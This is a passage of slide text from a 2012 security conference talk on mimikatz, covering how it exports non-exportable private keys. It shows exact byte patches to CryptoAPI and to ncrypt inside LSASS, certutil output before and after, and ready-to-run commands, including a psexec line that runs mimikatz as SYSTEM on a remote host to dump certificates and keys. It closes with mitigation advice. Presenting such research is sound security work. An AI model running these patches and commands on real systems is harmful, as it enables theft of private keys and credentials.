[email protected] ; blog.gentilkiwi.com
42
mimikatz :: crypto :: patchcapi
because I own my process
So what ? A module in my own process return that I can’t do something ?
CryptoAPI is in my memory space, let’s patch it !
.text:0AC0B7CB 0F 85 33 C7 FF FF
jnz
continue_key_export_or_archive
.text:0AC0B7CB 90
.text:0AC0B7CC E9 33 C7 FF FF
nop
jmp
continue_key_export_or_archive
.text:0AC1F749 0F 85 B6 3B FF FF
jnz
continue_key_export_or_archive_prepare
.text:0AC1F749 90
.text:0AC1F74A E9 B6 3B FF FF
nop
jmp
continue_key_export_or_archive_prepare
I wrote “4” bytes in my memory space
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
43
mimikatz :: crypto :: patchcapi
demo time !
Import, export, import as not exportable…. export
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
44
mimikatz :: crypto :: patchcapi
limitations
Because :
– I’m lazy
– I’ve seen in majority of case RSA keys for real life use
•
Elliptic Curve a little…
mimikatz crypto::patchcapi only deal with :
–
–
–
–
–
Microsoft Base Cryptographic Provider v1.0
Microsoft Enhanced Cryptographic Provider v1.0
Microsoft Enhanced RSA and AES Cryptographic Provider
Microsoft RSA SChannel Cryptographic Provider
Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
45
mimikatz :: crypto :: cng
how it works
“Cryptography API: Next Generation (CNG) is the long-term replacement for the
CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in
behavior.”
–
http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
“To comply with common criteria (CC) requirements, the long-lived keys must be isolated
so that they are never present in the application process. CNG currently supports the
storage of asymmetric private keys by using the Microsoft software KSP that is included
with Windows Server 2008 and Windows Vista and installed by default.
This time, keys operations are not made in the “user” process context
Process use RPC to call “Key isolation service” (keyiso) functions
It seems more secure than CryptoAPI…
–
It is, but it’s not perfect…
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
46
mimikatz :: crypto :: cng
how it’s exported (
PLAYSKOOL
level)
NT6 System protected process ML_SYSTEM
SYSTEM_MANDATORY_LABEL_NO_WRITE_UP
SYSTEM_MANDATORY_LABEL_NO_READ_UP
KeyIso Service (LSASS Process)
CNG
Load Private Key
Exportable
?
DPAPI Decode
yes
no
RPC
Process
Ask to export Key
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
NTE_NOT_SUPPORTED
-
Exported Key
[email protected] ; blog.gentilkiwi.com
47
mimikatz :: crypto :: patchcng
because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), RPC calls lead
to lsass(keyiso):ncrypt!SPCryptExportKey
This function do all the work to prepare the export, and check if the key is exportable
Exportable
?
mimikatz # crypto::exportKeys
[user] Clés CNG :
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
Exportabilité : NON
Taille clé
: 2048
Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK : (0x80090029) L'opération demandée n'est pas prise en charge.
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
48
mimikatz :: crypto :: patchcng
because sometimes I own LSASS
This time, checks and keys are in LSASS process…
And what ?
.text:6C815210 75 1C
jnz
short continue_key_export
.text:6C815210 EB 1C
jmp
short continue_key_export
I wrote “1” byte in LSASS memory space…
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
49
mimikatz :: crypto :: patchcng
demo time !
Import, export, import as not exportable…. export again
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
50
mimikatz :: crypto :: patchcng
limitations
Patch operation needs some privileges
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deal with :
– Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz, but MMC addin for certificates cannot
export CNG certificates… even those that are exportable (hu ?)
– certutil can…
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
51
mimikatz :: crypto :: patchcng
bonus
After one admin patched LSASS, all users of current system benefit of extra
exports
– until reboot / KeyIso service restart
Some others programs that doesn’t check the export flag before asking export
can work too
– Yeah, like the old good one : certutil
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil : -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
52
mimikatz :: crypto
memo
Some commands :
 mimikatz crypto::patchcapi crypto::exportCertificates exit
 psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng
"crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit
 mimikatz # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
 mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates
crypto::exportKeys exit
Password :
– PFX files are protected by this password : mimikatz
Keys
– When you import multiple time a certificate, exportable or not, Windows make duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny isn’t it ?
•
07/11/2012
So yes, mimikatz can export it
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
53
mimikatz :: crypto
what we can do ?
Exactly the same as for sekurlsa, it will prevent access to
accounts / computer !
– no admin, no admin, no admin…
Basics
– Use smartcards/token for users certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth
– See what Microsoft can do with TPM from Windows 8
• Virtual SmartCard seems promising
– Verify vendors implementation (Lenovo, Dell, …) of TPM CSP/KSP
• Their biometrics stuff was a little buggy ;)
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
54
mimikatz
what else can it do ?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
–
–
–
–
–
–
Play with tokens & privileges
Display SSDT x86 & x64
List minifilters actions
List Notifications (process / thread / image / registry)
List Objects hooks and procedures
…
…
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
55
mimikatz
that’s all folks !
Thanks’ to / Merci à :
– my girlfriend for her support (her LSASS crashed few times)
– Application Security Forum to offer me this great opportunity
• Partners and Sponsors for sure !
– Microsoft to always consider it as normal/acceptable 
– Security friends/community for their ideas & challenges
• nagual, newsoft, mubix, …
– You, for your attention !
Questions ?
Don’t be shy ;)
especially if you have written the corresponding slide number
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
56
Blog, Source Code & Contact
blog
mimikatz
source
email
07/11/2012
http://blog.gentilkiwi.com
http://blog.gentilkiwi.com/mimikatz
https://code.google.com/p/mimikatz/
[email protected]
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
57